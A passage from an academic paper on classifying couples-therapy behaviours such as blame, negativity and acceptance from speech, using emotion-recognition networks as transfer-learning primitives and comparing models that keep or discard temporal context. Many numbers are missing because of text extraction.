illustrates the network architecture and b-bp_* means the concatenation of all b-bp_k, where k ranges from to . in short, the b-bp vectors are fed into a stack of gated recurrent units (grus), followed by a densely connected layer which maps the last hidden state of the top recurrent layer to behavior label outputs. grus were introduced in chung et al. ( ) as one attempt to alleviate the issue of vanishing gradient in standard vanilla recurrent neural networks and to reduce the number of parameters over long short-term memory (lstm) neurons. grus have a linear shortcut through timesteps which avoids the decay and thus promotes gradient flow. in this model, only the sequential gru components and subsequent dense layers are trainable, while the ec networks remain fixed. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. segment segment segment segment… ec ec ec ec gru gru gru gru speech pretrained… … trainable behaviorsfc layers b-bp_* b-bp_* b-bp_* b-bp_* figure b-bp based context-dependent behavior recognition model. full-size doi: . /peerjcs. /fig- … speech … behaviorsfc layers max pooling e-bp_ cnn cnn cnn cnn emotion regression system (green box, figure ) frozen layers e-bp_ cnn cnn e-bp_ cnn cnn gru segment embedding e-bp_l adapted layers . . . 
gru segment embedding e-bp_l gru segment embedding e-bp_l cnn cnn cnn cnn figure e-bp based context-dependent behavior recognition model. e-bp_ l is the output from lth pretrained cnn layer. in practice multiple e-bp_ l can be employed at the same time through concatena- tion. in this work we only employ the output of a single layer at a time. full-size doi: . /peerjcs. /fig- context-dependent behavior recognition from emotion-embeddings it is widely understood that information closer to the output layer is more tied to the output labels while closer to the input layer information is less constrained and contains more information about the input signals. in our er network, the closer we are to the output, the more raw information included in the signal is removed and the more we are constrained to the basic emotions. given that we are not directly interested in the emotion labels, but in employing such relevant information for behavior, it makes sense to employ layers below the last output layer to capture more behavior-relevant information closer to its raw form. thus, instead of using the binary values representing the absence or existence of the basic emotions, we can instead employ emotion-embedding behavior primitives (e-ebp) as the input representation. the structure of the system is illustrated in fig. . after pretraining the er , we keep some layers of that system fixed, and employ their embeddings as the emotion-embedding behavior primitives. we will discuss the number of fixed layers in the experiments section. this e-bp serves as the input of the subsequent, trainable, convolutional and recurrent networks. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s eech a di e e ce c e a a e i hi he l cal i d c e ed ced gl ball e-bp figure illustration of local context awareness and global context reduction. in previous sections, the e-bps (and b-bps) are passed to a gru that preserves their sequences. here they are processed through pooling and context is removed. full-size doi: . /peerjcs. /fig- the overall system is trained to predict the longer-term behavior states. by varying the number of layers that remain unchanged in the er system and using different embeddings from different layers for the behavior recognition task we can identify the best embeddings under the same overall number of parameters and network architecture. the motivation of the above is that the fixed er encoding module is focusing on learning emotional affect information, which can be related but not directly linked with behaviors. by not using the final layer, we are employing a more raw form of the emotion-related information, without extreme information reduction, that allows for more flexibility in learning by the subsequent behavior recognition network. this allows for transfer learning (torrey & shavlik, ) from one domain (emotions) to another related domain (behaviors). thus, this model investigates the possibility of using transfer learning by employing emotional information as ‘‘building blocks’’ to describe behavior. reduced context-dependent behavior recognition from emotion-informed embeddings in the above work, we assume that the sequence of the behavior indicators (embeddings or emotions) is important. to verify the need for such an assumption, in this section, we propose varying the degree of employed context. 
through quantification, we analyze the time-scales at which the amount of sequential context affects the estimation of the underlying behavioral states. in this proposed model, we design a network that can only preserve local context. the overall order of the embeddings extracted from the different local segments is purposefully ignored so we can better identify the impact of de-contextualizing information as shown in fig. . in practice, this reduced-context model is built upon the existing cnn layers as in the e-bp case. we will create this reduced context system by employing only the e-bp li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. speech behaviors smaller receptive field cnn cnn cnns cnn pretrained … … fc fc speech behaviors larger receptive field cnn cnn cnns cnn pretrained … … fc fc local avg pooling local avg pooling e-bp_optimal max pooling max pooling e-bp_optimal a b figure e-bp reduced context-dependent behavior recognition model. model (a) has a smaller recep- tive field while model (b) has a larger receptive field because of the added local average pooling layers. full-size doi: . /peerjcs. /fig- embeddings. the e-bp embeddings are extracted from the same emotion system as before. in this case, however, instead of being fed to a recursive layer with full-session view, we eliminate the recursive layer and incorporate a variable number of cnn layers and local average pooling functions in between to adjust context view. since the final max-pooling layer ignores the order of the input, the largest context is determined by the receptive field view of the last layer before this max-pooling. we can thus investigate the impact of context by varying the length of the cnn receptive field. figure illustrates the model architecture. we extract the optimal e-bp based on the results of previous model, and then employ more cnn layers with different receptive field sizes to extract high-dimensional representation embeddings, and finally input them to the adaptive max-pooling along the time axis to eliminate the sequential information. within each cnn receptive field, shown as red triangles in the figure, the model still has access to the full receptive field context. the max pooling layer removes context across the different receptive windows. furthermore, the receptive field can be large enough to enable the model to capture behavioral information encoded over longer timescales. in contrast a very small receptive area, e.g., at timescale of phoneme or word, sensing behaviors should be extremely difficult (baumeister et al., ) and can even be challenging to detect emotions (mower & narayanan, ). the size of the receptive field is decided by the number of cnn layers, li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. corresponding stride size, and the number of local average pooling layers in between. in our model, we adjust the size of the receptive field by setting different number of local average pooling layers under which the overall number of network parameters is unchanged. datasets emotion dataset: cmu-mosei dataset the cmu multimodal opinion sentiment and emotion intensity (cmu-mosei) (zadeh et al., ) contains video files carefully chosen from youtube. each sample is a monologue with verified quality video and transcript. 
this database includes distinct speakers with kinds of topics, and are gender balanced with an average length of . seconds. speech segments are already filtered during the data collection process, thus all speech segments are monologues of verified audio quality. for each speech segment, six emotions (happiness, sadness, anger, fear, disgust, surprise) are annotated on a [ , ] likert scale for the presence of each emotion. ( : no evidence; : weak evidence; : evidence; and : high evidence of emotion). this, after averaging ratings from annotators, results in a -dimensional emotional rating vector per speech segment. cmu-mosei ratings can also be binarized for each emotion: if a rating is greater than it is considered that there is some presence of emotion, hence it is given a true presence label, while a zero results in a false presence of the emotion. the original dataset has , speech segments and each speech segment may contain more than one emotion presence label. through our experiments, we use the segments with available emotion annotations and standard speaker independent split from dataset sdk (zadeh, ): overall we have true presence in , segments for happiness, , for sadness, , for anger, , for surprise, , for disgust and , for fear. due to the imbalance, accurate estimation of some emotions will be challenging. the training set consists of , speech segments, while the validation set and test set consist of , and , sentences respectively. behavior dataset: couples therapy corpus the couples therapy dataset is employed to evaluate complex human behaviors. the corpus was collected by researchers from the university of california, los angeles and the university of washington for the couple therapy research project (christensen et al., ). it includes a longitudinal study of years of real distressed couples. each couple has been recorded at multiple instances over the years. at the beginning of each session, a relationship-related topic (e.g., ‘‘why can’t you leave my stuff alone?’’) was selected and the couple interacted about this topic for minutes. each participant’s behaviors were rated by multiple well-trained human annotators based on the couples interaction (heavey, gill & christensen, ) and social support interaction (jones & christensen, ) rating systems. behavioral codes were rated on a likert scale of to , where refers absence of the given behavior and indicates a strong presence. most of the sessions have to annotators, and annotator ratings were averaged to obtain the final -dimensional behavioral rating vector. the employed part of the dataset includes coded sessions, totaling . h of data across unique couples. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. audio processing and feature extraction behavioral dataset pre-processing for preprocessing the couples therapy corpus we employ the procedure described in (black et al., ). the main steps are speech activity detection (sad) and diarization. since we only focus on acoustic features extracted for speech regions, we extract the speech parts using the sad system described in ghosh, tsiartas & narayanan ( ), and only keep sessions with an average snr greater than db ( . % of original dataset). since labels of behavior are provided per-speaker, accurate diarization is important in this task. thus, for diarization we employ the manually-transcribed sessions and a forced aligner in order to achieve high quality interlocutor-to-audio alignment. 
this is done using the recursive asr-based procedure of alignment of the transcripts with audio by sailalign (katsamanis et al., ). speech segments from each session for the same speaker are then used to analyze behaviors. during testing phase, a leave-test-couples-out process is employed to ensure separation of speaker, dyad, and interaction topics. more details of the preprocessing steps can be found in (black et al., ). after the processing procedure above, the resulting corpus has a total of . h of audio data across unique couples and a total of sessions. feature extraction in this work, we focus only on the acoustic features of speech. we utilize log-mel filterbank energies (log-mfbs) and mfccs as spectrogram features. further, we employ pitch and energy. these have been shown in past work to be the most important features in emotion and behavior related tasks. these features are extracted using kaldi (povey et al., ) toolkit with a ms analysis window and a window shift of ms. the number of mel-frequency filterbanks and mfccs are both set to . for pitch, we use the extraction method in ghahremani et al. ( ), in which features, normalized cross correlation function (nccf), pitch (f ), the delta of pitch, are included for each frame. after feature extraction, we obtain an -dimensional feature per frame ( log-mfb’s, mfcc’s, energy, f , delta of f , and ncff). experiments and results discussion general settings for emotion-related tasks, we utilize the cmu-mosei dataset with the given standard train, validation, test data split from zadeh ( ). for the behavior related tasks, we employ the couple therapy corpus and use leave- - couples-out cross-validation. note that this results in distinct neural-network training- evaluation cycles for each experiment. during each fold training, we randomly split couples out as a validation dataset to guide the selection of the best trained model and prevent overfitting. all these settings ensure that the behavior model is speaker independent and will not be biased by speaker characteristics or recording and channel conditions. in our experiments, we employ five behavioral codes: acceptance, blame, positivity, negativity and sadness, each describing a single interlocutor in each interaction of the li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. full definitions are too long to insert in this manuscript and reader is encouraged to look into (heavey, gill & christensen, ; jones & christensen, ) table description of behaviors. behavior description acceptance indicates understanding, acceptance, respect for partner’s views, feelings and behaviors blame blames, accuses, criticizes partner and uses critical sarcasm and character assassinations positivity overtly expresses warmth, support, acceptance, affection, positive negotiation negativity overtly expresses rejection, defensiveness, blaming, and anger sadness cries, sighs, speaks in a soft or low tone, expresses unhappiness and disappointment couples therapy corpus. table lists a brief description of these behaviors from the annotation manuals (heavey, gill & christensen, ; jones & christensen, ). following the same setting of (black et al., ) to reduce effects of interannotator disagreement, we model the task as a binary classification task of low- and high- presence of each behavior. this also enables balancing for each behavior resulting in equal-sized classes. 
this is especially useful as some of the classes, e.g., sadness, have an extremely skewed distribution towards low ratings. more information on the distribution of the data and its impact on classification can be found in (georgiou et al., ). thus, for each behavior code and each gender, we filter out sessions on one extreme of the code (e.g., high blame) and sessions at the other extreme (e.g., low blame). since, due to the data cleaning process, some sessions may be missing some of the behavior codes, we use a mask and train only for the available behaviors. moreover, the models are trained to predict the binary behavior labels for all behaviors together. the loss is calculated by averaging the behavioral classification loss with masked labels. thus, this loss is not optimizing for any specific behavior but is focusing on the general, latent link between emotions and behaviors.

er and ec for emotion recognition
both the multi-emotion regression network (er) and the single-emotion classification network (ec) are trained using the cmu-mosei dataset. the multi-emotion regression network (er) system consists of a stack of cnn layers and an adaptive max-pooling layer, followed by fully connected layers with relu activation functions. during training, we randomly choose a segment from each utterance and represent the label of the segment using the utterance label. in our work, we employ a segment length of s. the model is trained jointly with all six emotions by optimizing the mean square error (mse) regression loss for all emotion ratings together using the adam optimizer (kingma & ba, ). in a stand-alone emotion regression task, a separate network that can optimize per emotion may be needed (through higher-level disconnected network branches); however, in our work, as hypothesized above, this is not necessary. our goal is to extract as much information as possible from the signal relating to any and all available emotions. we will, however, investigate optimizing per emotion in the ec case.

further to the er system, we can optimize per emotion through the single-emotion classification network (ec). this is trained for each emotion separately by replacing the pre-trained er's last linear layer with three emotion-specific fully connected layers. we use the same binary labeling setting as described in zadeh et al. ( ): within each emotion, samples with an original rating value larger than zero are assigned label 1, indicating the presence of that emotion, while samples with rating 0 are assigned label 0. during training, we randomly choose -second segments as before. during evaluation, we segment each utterance into one-second segments and the final utterance emotion label is obtained via majority voting. in addition, the cmu-mosei dataset has a significant data imbalance issue: the true label in each emotion is highly under-represented. to alleviate this, during training, we balance the two classes by subsampling the over-represented class in every batch, as sketched below.
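a minimal sketch of this per-batch balancing step is given below. it is an illustration only, not the authors' code: the function name, the numpy-based sampling and the toy label array are ours, and it assumes the binary presence labels for one emotion are available as a one-dimensional array.

```python
import numpy as np

def balanced_batch_indices(labels, batch_size, rng):
    """Return indices for one batch with equally many presence (1) and absence (0) samples.

    The over-represented class is subsampled so that both classes contribute
    batch_size // 2 examples (sampling with replacement only if a class holds
    fewer than half a batch).
    """
    pos = np.flatnonzero(labels == 1)
    neg = np.flatnonzero(labels == 0)
    half = batch_size // 2
    batch = np.concatenate([
        rng.choice(pos, half, replace=len(pos) < half),
        rng.choice(neg, half, replace=len(neg) < half),
    ])
    rng.shuffle(batch)
    return batch

# toy example: presence labels are heavily under-represented (5% positives)
rng = np.random.default_rng(0)
labels = np.array([1] * 50 + [0] * 950)
batch = balanced_batch_indices(labels, 32, rng)
print(labels[batch].mean())  # ~0.5 in every batch
```

the same idea can equally be implemented with a weighted sampler inside a deep learning framework; the essential point is that every batch contains roughly as many presence as absence examples.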
in our experiments, in order to correctly classify most of the relevant samples, the model is optimized and selected based on average weighted accuracy (wa), as used in zadeh et al. ( ). wa is defined in tong et al. ( ) as

weighted accuracy = (tp × n/p + tn) / (2n),

where tp (resp. tn) is the number of true positive (resp. true negative) predictions, and p (resp. n) is the total number of positive (resp. negative) examples.

table: weighted classification accuracy (wa) in percentage for emotion recognition on the cmu-mosei dataset, comparing the method in cmu-mosei (zadeh et al., ) with the proposed ec across the emotions anger, disgust, fear, happy, sad and surprise. bold numbers represent the best performing system.

as shown in table , we present the wa of each ec system and compare it with the state-of-the-art results from zadeh et al. ( ). compared with zadeh et al. ( ), our proposed cnn-based emotion recognition system achieves comparable results, and thus the predicted binary emotion labels can be considered satisfactory for further experiments. more importantly, our results indicate that the pre-trained er embedding captures sufficient emotion-related information and can thus be employed as a behavior primitive.

context-dependent behavior recognition
the main purpose of the experiments in this subsection is to verify the relationship between emotion-related primitives and behavioral constructs. we employ both b-bp and e-bp as described below. before that, we first use examples to illustrate the importance of context information in behavior understanding.

importance of context information in behavior understanding
prior to presenting the behavior classification results, we use two sessions from the couples therapy corpus to illustrate the importance of context information in behavior understanding. once the single-emotion classification network (ec) systems are trained, a sequence of emotion label vectors can be generated by applying the ec systems on each speech session. we choose two sessions and plot the sequences of emotion presence vectors of the first seconds as an example in fig. , in which each dot represents the emotion presence (i.e., predicted label equal to 1) at the corresponding time.

figure: sessions with similar percentage of emotions presence but different behavior label. panels (a)-(f) show the presence of anger, disgust, fear, happy, sad and surprise over time (s) for the two sessions; panel (g) shows the percentage of segments with emotion presence for each emotion.

for each emotion, the percentage of emotion presence segments is calculated by dividing the number of emotion presence segments by the total number of segments. these two sessions are selected as an example since they have similar audio stream lengths and percentages of emotion presence segments but different behavior labels: red represents one session with "strong presence of negativity" while blue represents another session with "absence of negativity". this example reveals that, as we expected, behaviors are determined not only by the percentage of affective constructs but also by the contextual information. as shown on the left (figs. a-f), the emotion presence vectors exhibit different sequential patterns in the two sessions, even though no significant distribution difference can be observed in fig. g.
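to make the distinction between marginal presence rates and temporal patterning concrete, the toy sketch below (ours, using synthetic label sequences rather than the couples therapy sessions) builds two sequences with identical presence percentages but very different sequential structure, mirroring the contrast between fig. g and figs. a-f.

```python
import numpy as np

rng = np.random.default_rng(1)

# two toy sessions of 100 one-second segments for a single emotion:
# both contain the emotion in exactly 30% of their segments, but session_a
# concentrates it in one burst while session_b scatters it across the session.
session_a = np.zeros(100, dtype=int)
session_a[10:40] = 1
session_b = np.zeros(100, dtype=int)
session_b[rng.choice(100, 30, replace=False)] = 1

for name, seq in [("a", session_a), ("b", session_b)]:
    presence_rate = seq.mean()                      # what a fig. g-style summary captures
    transitions = int(np.abs(np.diff(seq)).sum())   # a crude order-sensitive statistic
    print(name, f"presence={presence_rate:.2f}", f"transitions={transitions}")
```

a summary that only records the presence rate cannot distinguish the two sequences, whereas any description that preserves their order can; this is precisely the information the context-dependent models below are meant to exploit.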
b-bp based context-dependent behavior recognition
binarized emotion-vector behavior primitives are generated by applying the single-emotion classification network (ec) systems on the couples therapy data: for each session, a sequence of emotion label vectors is generated as e = [e_1, e_2, ..., e_t], where each element e_i is the b-bp binary label vector (one entry per emotion) at time i. that means that e_ij represents the presence, through a binary label 0 or 1, of emotion j at time i. such b-bp are the input of the context-dependent behavior recognition model, which has two layers of grus followed by two linear layers, as illustrated in fig. .

table: behavior binary classification accuracy in percentage for the context-dependent behavior recognition model from emotion labels, reporting the average and the per-behavior accuracy for acceptance, blame, positivity, negativity and sadness. (note: the sadness behavior code does not necessarily align perfectly with the basic emotion "sad" but follows the ssirs manual.)

as shown in table , the average binary classification accuracy over these five behaviors is . %. considering that the classification accuracy can reach up to % by chance with balanced data, our results show that behavioral states can be weakly inferred from the emotion label vector sequences. further, we perform the mcnemar test, and the results above and throughout the paper are statistically significant with p < . . despite the low accuracy for the behavior positivity, these results suggest a relationship between emotions and behaviors that we investigate further below.

e-bp based context-dependent behavior recognition
the simple binary emotion vectors (as b-bp) indeed link emotions and behaviors. however, they also demonstrate that the binarized form of b-bp limits the information bandwidth provided to higher layers in the network, and as such limits the ability to predict the much more complex behaviors. this is reflected in the low accuracies in table , and it further motivates the use of the emotion-embedding behavior primitives. as described in fig. , we construct the input of the e-bp context-dependent behavior recognition system using the pretrained multi-emotion regression network (er). these e-bp embeddings capture more information than just the binary emotion labels. they potentially capture a higher abstraction of emotional content and richer paralinguistic information, conveyed through a non-binarized representation that does not limit the information bandwidth, and they may further capture other information such as speaker characteristics or even channel information. we employ embeddings from different layers of the er network. the layers before the employed embedding are in each case frozen and only the subsequent layers are trained, as denoted in fig. . the trainable part of the network includes several cnn layers with max pooling and subsequent gru networks. the gru part of the network is identical to the one used by the context-dependent behavior recognition model from b-bp. the use of different-depth embeddings can help identify where information loss becomes too specific to the er loss objective versus where there is too much information unrelated to the behavior task. in table , the none-e-bp model, as the baseline, means that all parameters are trained from random initialization instead of using the pretrained e-bp input.
while e-bp_ l model means the first l layers of the pretrained er network are fixed and their output is used as the embedding e-bp for the subsequent system. as seen in the second column of the table, all of e-bp based models perform significantly better than the b-bp based model, which achieves an improvement of . % on average and up to . % for negativity. these results, further support the use of basic emotions as constructs of behavior. in general, for all behaviors, the higher-level e-bp s, which are closer to the er loss function, can capture affective information and obtain better performance in behavior quantification compared with lower-level embeddings. from the description in table , some behaviors are closely related to emotions. for example, negativity is defined in part as ‘‘overtly expresses rejection, defensiveness, blaming, and anger’’, and sadness is defined in part as li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. , samples from commit: https://github.com/a zadeh/ cmu-multimodalsdk/commit/ f f df c d fd cc . table behavior binary classification accuracy in percentage for context-dependent behavior recog- nition model from emotion-embeddings. bold numbers represent the best performing system. average acceptance blame positivity negativity sadness none-e-bp model (baseline) . . . . . . e-bp_ model . . . . . . e-bp_ model . . . . . . e-bp_ model . . . . . . e-bp_ model . . . . . . ‘‘expresses unhappiness and disappointment’’. this shows that these behaviors are very related to emotions such as anger and sad, thus it’s expected that an embedding closer to the er loss function will behave better. note that these are not at all the same though: a negative behavior may mean that somewhere within the min interaction or through unlocalized gestalt information the expert annotators perceived negativity; in contrast a negative emotion has short-term information (on average s segment) that is negative. an interesting experiment is what happens if we use a lower-ratio of emotion (out-of- domain) vs. behavior (couples-in-domain) data. to perform this experiment we use only half of the cmu-mosei data to train another er system, and use this less robust er system and corresponding e-bp representations to reproduce the behavior quantification as in table . what we observe is that the reduced learning taking place on emotional data requires the in-domain system to have prefer embeddings closer to the feature. specifically negativity performs equally well with layers or at . %. positivity performs best with layer at . %, blame and acceptance perform best with layer at . % and . % respectively while sadness performs best through layer at . %. in the reduced data case we observe that best performing layer is not consistently layer . employing the full dataset as in table provides better performance than using less data and in that case layer (e-bp_ ) is always the best performing layer, thus showing that more emotion data provides better ability of transfer learning. reduced context-dependent behavior recognition in the previous two sections we demonstrate that there is a benefit to transfer emotion- related knowledge to behavior tasks. we show that the wider bandwidth information transfer through an embedding e-bp is beneficial to a binarized b-bp representation. 
we also show that, depending on the degree of relationship of the desired behavior to the signal or to the basic emotions, different layers, closer to the input signal or closer to the output loss, may be more or less appropriate. however, in all the above cases we assume that the sequence and contextualization of the extracted emotion information is needed; this is captured and encoded through the recursive gru layers. we conduct an alternative investigation into how much contextual information is needed. as discussed in section 'reduced context-dependent behavior recognition from emotion-informed embeddings' and shown in fig. , we can reduce context by changing the receptive field of our network prior to removing sequential information via max pooling.

in this section we select the best e-bp based on the average results in table , i.e., e-bp- , as the input of the reduced context-dependent behavior recognition model. based on the e-bp- embeddings, the reduced context-dependent model employs additional cnn layers with optional local average pooling layers in between, followed by an adaptive max pooling layer and three fully connected layers to predict the session-level label directly, without sequential modules (a rough illustrative sketch of this head is given below). since the number of parameters of this model is largely increased, dropout (srivastava et al., ) layers are also utilized to prevent overfitting. local average pooling layers, with a fixed kernel size and stride, are optionally added between the newly added cnn layers to adjust the final size of the receptive field: the more average pooling layers we use, the larger the temporal receptive field obtained for the same number of network parameters. we ensure that the overall number of trainable parameters is the same for the different receptive field settings, which provides a fair comparison of the resulting systems. the output of these cnn/local pooling layers is passed to an adaptive max pooling before the fully connected layers, as in fig. .

table: behavior binary classification accuracy in percentage for reduced context-dependent behavior recognition from emotion-informed embeddings, reporting the average and per-behavior accuracy (acceptance, blame, positivity, negativity, sadness) for models with different temporal receptive field sizes. bold numbers represent the best performing system.

in table , each model has a different temporal receptive window, ranging from seconds to min. for most behaviors, we observe better classification as the receptive field size increases, especially in the range from seconds to s, demonstrating the need for longer observations for behaviors. furthermore, the results suggest that different behaviors require different observation window lengths to be quantified, which is also observed by chakravarthula et al. ( ) using lexical analysis. by comparing results across different receptive window sizes, we can indirectly obtain the appropriate behavior analysis window size for each behavior code. as shown in table , sadness has a smaller optimal receptive field size than behaviors such as acceptance, positivity and blame. this is in good agreement with the behavior descriptions.
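as a rough illustration of the reduced-context head described above, the pytorch-style sketch below stacks convolutional blocks on top of e-bp embeddings and uses optional local average pooling to widen the temporal receptive field before an order-destroying adaptive max pooling. all layer counts and sizes here are placeholders chosen by us and do not reproduce the exact configuration reported in the appendix.

```python
import torch
import torch.nn as nn

class ReducedContextHead(nn.Module):
    """Sketch of a reduced-context classifier head over e-BP embeddings.

    Inserting AvgPool1d layers between the convolutions widens the temporal
    receptive field without changing the number of trainable parameters, and
    the final AdaptiveMaxPool1d discards the ordering of the local windows.
    """
    def __init__(self, in_channels=128, n_avg_pools=2):
        super().__init__()
        blocks = []
        for i in range(4):
            blocks += [nn.Conv1d(in_channels, in_channels, kernel_size=3, padding=1),
                       nn.ReLU(), nn.Dropout(0.3)]
            if i < n_avg_pools:                        # optional pooling widens the receptive field
                blocks.append(nn.AvgPool1d(kernel_size=2, stride=2))
        self.convs = nn.Sequential(*blocks)
        self.pool = nn.AdaptiveMaxPool1d(1)            # removes sequential order across windows
        self.fc = nn.Sequential(nn.Linear(in_channels, 64), nn.ReLU(), nn.Linear(64, 1))

    def forward(self, ebp):                            # ebp: (batch, channels, time)
        h = self.pool(self.convs(ebp)).squeeze(-1)
        return self.fc(h)                              # one logit per session (low/high behavior)

# toy usage: e-BP embeddings for two sessions of 1,000 frames each
logit = ReducedContextHead()(torch.randn(2, 128, 1000))
print(logit.shape)  # torch.Size([2, 1])
```

varying n_avg_pools changes the receptive field while leaving the number of trainable parameters untouched, which is what allows the fair comparison across receptive-field settings described above.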
for example, in line with their descriptions, the behaviors acceptance, positivity and blame often require relatively longer observations, since they relate to understanding and respect for the partner's views, positive negotiation, and accusation, respectively, which often require multiple turns in a dialog and context to be captured. on the other hand, sadness, which can be expressed via emitting a long, deep, audible breath, and which is also related to short-term expression of unhappy affect, can be captured with shorter windows. moreover, we find that the classification of negativity reaches high accuracy when using a large receptive field. this might be due to the fact that negative behavior in the couples therapy domain is complex: it is not only revealed by short-term negative affect but is also related to context-based negotiation and hostility, and it is captured through gestalt perception of the interaction. (note that this does not make any claims on interlocutor dynamics, talk time, turn-taking etc., but concerns single-person acoustics only.) in addition, the conclusion that most of the behaviors do not benefit much from windows longer than s matches the existing literature on thin slices (ambady & rosenthal, ), which refer to excerpts of an interaction that can be used to arrive at a judgment of behavior similar to the one that would be reached if the entire interaction had been used.

analysis on behavior prediction uncertainty reduction
besides verifying the improvement from the b-bp based model to the e-bp based models, in this section we further analyze the importance of context information for each behavior by comparing results between the e-bp based context-dependent and reduced context-dependent models. this analysis examines which behaviors are more context dependent and to what degree. classification accuracy is used as the evaluation criterion in the previous experiments. more generally, this number can be regarded as the probability of correct classification when a new session is measured. inspired by entropy from information theory, we define a metric named prediction uncertainty reduction (pur) and use it to indicate the relative behavior prediction and interpretation improvement among different models for each behavior (a short numeric sketch of this metric is given below). suppose p_m(x) ∈ [0, 1] is the probability of correct classification for behavior x with model m. we define the uncertainty of behavior prediction as

i_m(x) = −p_m(x) log_2(p_m(x)) − (1 − p_m(x)) log_2(1 − p_m(x)).

if p_m(x) is equal to 1, then i_m(x) = 0 and there is no improvement possibility; if p_m(x) is equal to 0.5, the same as random prediction accuracy, the uncertainty is the largest. we further define the prediction uncertainty reduction (pur) value of behavior x from model m to model n as

r_{m→n}(x) = i_m(x) − i_n(x).

we use this value to indicate improvements between different models. we use pur to measure the relative improvement of the e-bp based context-dependent and e-bp based reduced context-dependent models, respectively, over the baseline b-bp based context-dependent model. a larger pur value indicates a clearer improvement in behavior prediction. for each behavior and each e-bp based model, we choose the best performing model (the bold numbers from tables and ) to calculate the pur value relative to the baseline b-bp context-dependent model. in fig. , as expected, for most behaviors the positive pur values verify the improvement from using informative e-bp over simple binary b-bp.
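the pur metric defined above is simply a difference of binary entropies. the short sketch below is our own numeric illustration; the two accuracy values are hypothetical and are not taken from the tables.

```python
import numpy as np

def prediction_uncertainty(p):
    """Binary entropy (in bits) of the correct-classification probability p."""
    if p in (0.0, 1.0):
        return 0.0
    return -p * np.log2(p) - (1 - p) * np.log2(1 - p)

def pur(p_from, p_to):
    """Prediction uncertainty reduction when accuracy moves from p_from to p_to."""
    return prediction_uncertainty(p_from) - prediction_uncertainty(p_to)

# hypothetical accuracies: a b-BP baseline at 0.60 and an e-BP model at 0.72
print(round(pur(0.60, 0.72), 3))  # positive -> the e-BP model leaves less uncertainty
```

a positive value indicates that the second model leaves less prediction uncertainty than the first.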
in addition, the results support the hypothesis that the sequential order of affective states is a non-negligible factor in behavior analysis, since the pur of the context-dependent model (blue) is better than that of the reduced context one (red) for most behaviors. more interestingly, for each behavior, the difference between the two bars (i.e., the pur difference) can imply the necessity and importance of the sequential and contextual factor in quantifying that behavior. we notice that for "positive" or more "complex problem solving" related behaviors (e.g., acceptance, positivity), the context based model can achieve better performance than the reduced context model, while the pur differences for "negative" related behaviors (e.g., blame, negativity) vary across behaviors.

figure: pur optimal value of e-bp based context-dependent and reduced context-dependent models across behaviors (prediction uncertainty reduction value shown for the average and for acceptance, blame, positivity, negativity and sadness).

for example, the behavior acceptance, which has a large pur difference, is more related to "understanding, respect for partner's views, feelings and behaviors", which could involve more turns in a dialog and more context information. in addition, positivity requires the monitoring of consistently positive behavior, since a single negative instance within a long positive time interval would still reduce positivity to a very low rating. in contrast, we see that although blame can still benefit from a larger contextual window, there is no benefit to employing the full context. this may imply that blame expression is more localized. furthermore, our findings are also congruent with many domain annotation processes: some behaviors are potentially dominated by salient, short-range information, where one short-duration appearance can have a significant impact on the whole behavior rating, while other behaviors need longer context to analyze (heavey, gill & christensen, ; jones & christensen, ). however, among all behaviors, "sadness" is always the hardest one to predict with high accuracy, and there is little improvement after introducing the different bps. this could result from the extremely skewed distribution towards low ratings, as mentioned above and in (georgiou et al., ; black et al., ), which leads to a very blurred binary classification boundary compared to other behaviors. the detailed network architecture and training parameters are shown in the appendix, tables a –a .

conclusion and future work
in this work, we explored the relationship between emotion and behavior states, and further employed emotions as behavioral primitives in behavior classification. in our designed systems, we first verified the existing connection between basic emotions and behaviors, then further verified the effectiveness of utilizing emotions as behavior primitive embeddings for behavior quantification through transfer learning. moreover, we designed a reduced context model to investigate the importance of context information in behavior quantification.
through our models, we additionally investigated the empirical analysis window size for speech behavior understanding, and verified the hypothesis that the order of affective states is an important factor for behavior analysis. we provided experimental evidence and systematic analyses for behavior understanding via emotion information. to summarized, we investigated three questions and we concluded: . can the basic emotion states infer behaviors? the answer is yes. behavioral states can be weakly inferred from emotions states. however behavior requires richer information than just binary emotions. . can emotion-informed embeddings be employed in the prediction of behaviors? the answer is yes. the rich emotion involved embedding representation helps the prediction of behaviors. they also do so much better than the information-bottlenecked binary emotions. . is the contextual (sequential) information important in defining behaviors? the answer is yes. we verify the importance of context of behavior indicators for all behaviors. some behaviors benefit from incorporating the full interaction ( minutes) length while others require as little as seconds of information, but all perform best when given contextual information. moreover, the proposed neural network systems are not limited to the datasets and domains of this work, but potentially provides a path for investigating a range of problems, such as local versus global, sequential versus non-sequential comparisons in many related areas. in addition to the relationship of emotions to behaviors, a range of other cues can also be incorporated towards behavior quantification. moreover, many other aspects of behavior, such as entrainment, turn-taking duration, pauses, non-verbal vocalizations, and influence between interlocutors, can be incorporated. many such additional features can be similarly developed on different data and employed as primitives; for example entrainment measures can be trained through unlabeled data (nasir et al., ). furthermore, we expect that the results of behavior classification accuracy maybe be further improved through improved architectures, parameter tuning, and data engineering for each behavior of interest. in addition, behavior primitives, e.g., from emotions, can also be employed via the lexical and visual modalities. acknowledgements the authors would like to thank yi zhou, sandeep nallan chakravarthula and professor shrikanth narayanan for helpful discussions and comments. li et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. appendix a. detailed network architecture and training parameters table a network architecture of er. multi-emotion regression network (er) framework (input: * ; output: ) training details: adam optimizer(lr = e– ), batch size , mseloss conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu conv d(in_ch= , out_ch= , kernel size= , stride= , padding= ) relu adaptivemaxpool d( ) 